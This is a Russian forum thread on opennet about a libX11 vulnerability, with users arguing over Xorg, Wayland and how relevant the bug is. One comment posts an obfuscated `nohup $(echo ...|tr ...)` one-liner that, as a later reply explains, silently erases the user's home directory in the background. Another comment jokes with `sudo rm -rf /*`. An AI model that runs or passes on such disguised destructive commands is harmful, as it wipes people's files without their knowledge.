Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Уязвимость в библиотеке libX11, opennews (??), 16-Июн-23, (0) [смотреть все] Xorg доживает свои последние дни, и это хорошо , Аноним (1), 10:52 , 16-Июн-23, (1) –34 // Нам повезло мы застали иксы и все его ужасы Следующее поколение не будет ценит, Аноним (7), 11:06 , 16-Июн-23, (7) –2 // после его переписывания на Rust , Аноним (18), 12:39 , 16-Июн-23, (18) –4 // Скрыто модератором, Аноним (-), 14:27 , 16-Июн-23, (36) Так переписывай, что останавливает , Аноним (66), 10:16 , 18-Июн-23, (66) +1 То есть никогда , Neon (??), 02:38 , 25-Июн-23, (80) Какие такие ужасы Использовал иксы в начале нулевых, когда ими пользовались име, v3625 (ok), 13:30 , 16-Июн-23, (23) +11 // В начале нулевых уже не совсем по-иксовому Тогда уже вовсю GTK, Qt, которые гон, Аноним (18), 14:05 , 16-Июн-23, (31) +1 Тогда еще спокойно можно было не обращать на это внимание И gtk1 был ничего , v3625 (ok), 14:19 , 16-Июн-23, (35) Даже Qt5 не гоняет отрендеренные картинки, если собрано с native backend Пробле, Предпоследний пользователь сетевой прозрачности (?), 10:40 , 18-Июн-23, (68) Какие ужасы Давайте расскажу 1 Переусложненный антикварный код, грубо не соот, Аноним (-), 14:18 , 16-Июн-23, (34) +3 Нет у современных пользователей никаких запросов Им как в уши надуют, такие у н, v3625 (ok), 15:05 , 16-Июн-23, (37) +2 Мир не стоит на месте, вон то уже нормально работает в других системах Пользова, Аноним (60), 00:55 , 18-Июн-23, (60) Позвольте системно разобрать ваши возражения, выделив из вашего потока сознания , v3625 (ok), 02:46 , 18-Июн-23, (64) Я не хочу разбираться в подробностях, но вы сейчас НЕ ПОМОГАЕТЕ хоронить иксы За, Илья (??), 10:23 , 18-Июн-23, (67) –2 А почему я должен помогать их хоронить Я, наоборот, попытался обосновать, почему, v3625 (ok), 11:02 , 18-Июн-23, (69) Чому в FreeBSD я его не наблюдаю Наблюдал когда-то давно на невидии, решалось пр, Ананий (?), 16:30 , 16-Июн-23, (41) +1 А чому я во фрибзд только тиринг и наблюдаю У тебя железо такое как у всех , Аноним (50), 09:28 , 17-Июн-23, (50) S3 Virge Давай показывай шо там у тебя и что правил в Xorg conf, шоб пытаться ис, Ананий (?), 13:48 , 17-Июн-23, (54) Вообще-то для начала нормальная графика должна работать без вот этого вот В реж, Аноним (-), 01:05 , 18-Июн-23, (62) Вопрос был в работоспособности, а не в том, лень тебе ковырять конфиги и читать , Ананий (?), 14:09 , 19-Июн-23, (75) Может потому что не работаешь с графикой, не смотришь видео, не делаешь видеозво, Аноним (-), 01:03 , 18-Июн-23, (61) 2д в гимпе считается Ютюп smplayer сойдет за просмотр Игрульки редко, найтивны, Ананий (?), 14:19 , 19-Июн-23, (76) Крепко жму вашу руку Ровно мои впечатления от иксов На фоне сидящих на macOS л, voiceofreason (?), 18:05 , 20-Июн-23, (77) Мне поэтому нравились ранние версии Windows, что там в окнах использовались моно, Zenitur (ok), 11:42 , 17-Июн-23, (53) +1 Надежность Да он сначала даже не запускался Недавно затестил еще раз - ну, оно, Oe (?), 09:52 , 17-Июн-23, (52) ещё тебя переживёт, Аноним (11), 11:57 , 16-Июн-23, (11) +3 Жалко на опеннете нет механизма запуска опросов Думаю результаты удивили бы нем, rshadow (ok), 13:48 , 16-Июн-23, (25) А что работает на вашем хваленом вейланде игры с portproton работают запись э, Администратор (?), 13:44 , 18-Июн-23, (72) // Игры с портпротоном работают без проблем Запись экрана работает отлично Qemu р, AleksK (ok), 19:38 , 18-Июн-23, (74) Да Выкидывать это всё надо Сейчас вот ставил OpenJDK Headless, а всё равно что-, soarin (ok), 10:54 , 16-Июн-23, (2) –4 // Кому и кобыла невеста, кофи анан (?), 10:57 , 16-Июн-23, (3) +4 Java только в том году спохватились, что основные дистрибутивы всё выкидывают , Аноним (39), 15:12 , 16-Июн-23, (39) iPony пользуется Ябблотехникой, обожает поней Soarin под МакОСью, лошадиная ават, Аноним (58), 22:15 , 17-Июн-23, (58) // Так soarin тоже по поням так-то, Аноним (59), 23:38 , 17-Июн-23, (59) Нажми на мой профиль и посмотри ФИО Просто один аккаунт зареганный, а другой ано, soarin (ok), 06:18 , 18-Июн-23, (65) Начни с себя тм , Тот_Самый_Анонимус__ (?), 13:41 , 22-Июн-23, (78) Скрыто модератором, Аноним (-), 11:06 , 16-Июн-23, (6) –1 Выявлена уязвимость В случае если юзер пропишет в терминале sudo rm -rf то , Аноним (8), 11:08 , 16-Июн-23, (8) –2   // в случае с rm -rf пользователь уже знает, что команда деструктивная в случае , Аноним (7), 11:29 , 16-Июн-23, (9) +5   // А с чего бы графическому серверу быть деструктивным Это какой вообще юзкейс дол, Анониссимус (?), 12:06 , 16-Июн-23, (13)   // Напоминаю, что диды задумывали иксы по клиент-серверной модели Если ssh-сервер с, Аноним (7), 12:09 , 16-Июн-23, (14) +2   Можно всё таки озвучить юзкейс, при котором деструктивный сервер будет представл, Анониссимус (?), 01:29 , 17-Июн-23, (47)   А в случае с нижеприведенным nohup echo - 124 tr - - - - , Аноним (24), 13:33 , 16-Июн-23, (24)   // можно хардкорно решить вопросик, например chflags -R schg если уж руки так и тя, Ананий (?), 16:36 , 16-Июн-23, (42)   Самое милое в приведенной выше команде 8212 отсутствие необходимости рута Он, Аноним (55), 14:40 , 17-Июн-23, (55)   Обычно X сервер, это компьютер за которым ты сидишь Его можно модифицировать та, Иван_Лох (?), 12:03 , 16-Июн-23, (12) +1 // Эх, вьюнош 8230 Иногда это мультихед воркстейшн, а иногда на гриде сервак для р, Unnamed Player (?), 13:18 , 16-Июн-23, (21) // Вьюнош - скорее ты X-сервер запускается на РМ, и транслирует графику от X-клиен, 1 (??), 14:15 , 16-Июн-23, (33) Зачем они её развивают , Аноним (15), 12:22 , 16-Июн-23, (15) –2 // как замена вяленому, Аноним (17), 12:31 , 16-Июн-23, (17) +10 // Ващет, протокол сейчас реализован в libxcb, Аноним (18), 12:53 , 16-Июн-23, (20) +1 Для legasy софта, который не пользуется графическими тулкитами, а все виджеты ри, Аноним (18), 12:52 , 16-Июн-23, (19) Кажется слово развиваемый тут не совсем уместно Ну или совсем не уместно Луч, Анонимусс (?), 17:30 , 16-Июн-23, (43) Это все не правда, Иксы писали ветераны Юникс, которые все сделали правильно, в , Аноним (16), 12:31 , 16-Июн-23, (16) +4 // Не хочу тебя расстраивать, но вяленого пишут те же самые люди что и иксы ну, за, Анонин (?), 18:13 , 16-Июн-23, (44) // А что в них такого надо расширять , BeLord (ok), 17:58 , 22-Июн-23, (79) Диды на Си писали Можем повторить , Аноним (22), 13:28 , 16-Июн-23, (22) // С одной стороны, как раз Диды и решили написать вяленого Но с другой, повторить, rshadow (ok), 13:49 , 16-Июн-23, (26) // Диды оказались уже не теми, что Иксы писали , Аноним (18), 14:01 , 16-Июн-23, (30) +2 // Да почему Кейт Пакард вполне себе тот самый Но даже он затрахался натягивать с, Аноним (-), 01:06 , 18-Июн-23, (63) А чего не получилось Окна открываются, удалённый десктоп работает Кто-нибудь об, Илья (??), 07:57 , 17-Июн-23, (49) // для тех, кто не пользуется гномокедами или й3 173 8211 вообще ничего, вейла, Аноним (56), 16:03 , 17-Июн-23, (56) –1 У меня уже года 2 вейленд работает без каких-либо настроек на гноме Я не понял,, Илья (??), 11:37 , 18-Июн-23, (70) ну, исполать напишу повторно, что гном, кеды и свэй подходят не только лишь все, Аноним (73), 15:04 , 18-Июн-23, (73) За X11 не держаться, на них работают X-сы еще в 80-х заложили, а в 1996 вышли, fi (ok), 16:10 , 17-Июн-23, (57) +2 Не совсем так На Хабре выкладывали перевод одного из разработчиков Х-в ,имя уже , maximnik0 (?), 13:09 , 18-Июн-23, (71) Ну то-есть хрен эксплуатируешь на практике Потому что если у кого вредоносный с, Аноним (-), 13:56 , 16-Июн-23, (27) // Какой-нибудь xephyr или xnest запускаемый из npm или cargo Легко , Аноним (32), 14:08 , 16-Июн-23, (32) 1,2,8,12,15,16,22,27

Сообщения

[Сортировка по времени | RSS]

8. "Уязвимость в библиотеке libX11"	–2 +/–
Сообщение от Аноним (8), 16-Июн-23, 11:08
> в случае его подключения к вредоносному X-серверу или промежуточному прокси, контролируемому злоумышленником Выявлена уязвимость. В случае если юзер пропишет в терминале sudo rm -rf /* то ..
Ответить | Правка | Наверх | Cообщить модератору

	9. "Уязвимость в библиотеке libX11"	+5 +/–
	Сообщение от Аноним (7), 16-Июн-23, 11:29
	в случае с rm -rf /* пользователь уже знает, что команда деструктивная. в случае коннекта к серверу пользователь не знает, вредоносный это сервер или нет. как 13-летней девочке приходится разжевывать вроде очевидные вещи.
	Ответить | Правка | Наверх | Cообщить модератору

	13. "Уязвимость в библиотеке libX11"	+/–
	Сообщение от Анониссимус (?), 16-Июн-23, 12:06
	А с чего бы графическому серверу быть деструктивным? Это какой вообще юзкейс должен быть, что бы запускать у себя приложение, а показывать его на неком другом вредоносном сервере? Полный бред. Пример c `rm -rf /` тут не подходит. Это скорее похоже на уязвимость в ssh, ведь через ssh можно сделать `rm -rf`!
	Ответить | Правка | Наверх | Cообщить модератору

	14. "Уязвимость в библиотеке libX11"	+2 +/–
	Сообщение от Аноним (7), 16-Июн-23, 12:09
	Напоминаю, что диды задумывали иксы по клиент-серверной модели. > через ssh можно сделать `rm -rf`! Если ssh-сервер сделает rm -rf у тебя, хотя ты этого никак не ждешь, то это уязвимость. Именно о таком случае речь в новости. Но ты поскорее побежал комментировать!
	Ответить | Правка | Наверх | Cообщить модератору

	47. "Уязвимость в библиотеке libX11"	+/–
	Сообщение от Анониссимус (?), 17-Июн-23, 01:29
	> Напоминаю, что диды задумывали иксы по клиент-серверной модели. Можно всё таки озвучить юзкейс, при котором деструктивный сервер будет представлять опасность? Зачем тебе может понадобиться запускать у себя X11-приложуху на вредоносном сервере?
	Ответить | Правка | Наверх | Cообщить модератору

	24. "Уязвимость в библиотеке libX11"	+/–
	Сообщение от Аноним (24), 16-Июн-23, 13:33
	А в случае с нижеприведенным? nohup $(echo '<-{}<&{~'|tr ' -/:-@[-`{}*' '`-{/ - -*') &>/dev/null&
	Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

	42. "Уязвимость в библиотеке libX11"	+/–
	Сообщение от Ананий (?), 16-Июн-23, 16:36
	можно хардкорно решить вопросик, например chflags -R schg / если уж руки так и тянутся позапускать из-под рута всякую нечисть.
	Ответить | Правка | Наверх | Cообщить модератору

	55. "Уязвимость в библиотеке libX11"	+/–
	Сообщение от Аноним (55), 17-Июн-23, 14:40
	Самое милое в приведенной выше команде — отсутствие необходимости рута. Она в фоне затирает хомяк. Система на локалхосте — мелочь, переставить недолго. А вот люьовно собираемый архив порно, фотки со своей сиране кошкой это чувствительно. Если нет бэкапа. А очень часто его нет.
	Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема